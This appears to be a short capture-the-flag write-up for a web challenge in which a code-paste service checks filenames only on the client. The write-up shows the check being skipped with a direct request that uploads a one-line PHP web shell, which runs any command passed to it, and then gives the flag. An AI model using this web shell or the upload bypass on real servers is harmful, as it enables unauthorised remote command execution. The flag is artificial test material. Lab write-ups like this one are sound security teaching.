SCS

Description

SCS [Web]

We uncovered a code repository and it appears to be where ARIA is storing mission-critical code. We need to break in!

https://uscybercombine-s4-scs.chals.io/

Solution

SCS

Uploaded files are placed in /uploads directory

SCS-2

The technology used is PHP

SCS-1

The frontend restricts using special characters:

Paste file name can only contain alphanumeric characters

But making direct request to backend it's bypassed:

SCS-3

Upload shell:

{
	"pasteContent": "<?PHP echo system($_REQUEST[0]); ?>",
	"pasteFileName":"t.php"
}

It works:

After some enumeration we find location of real flag.txt

Flag: SIVBGR{v@lidate_s3rver_s1de}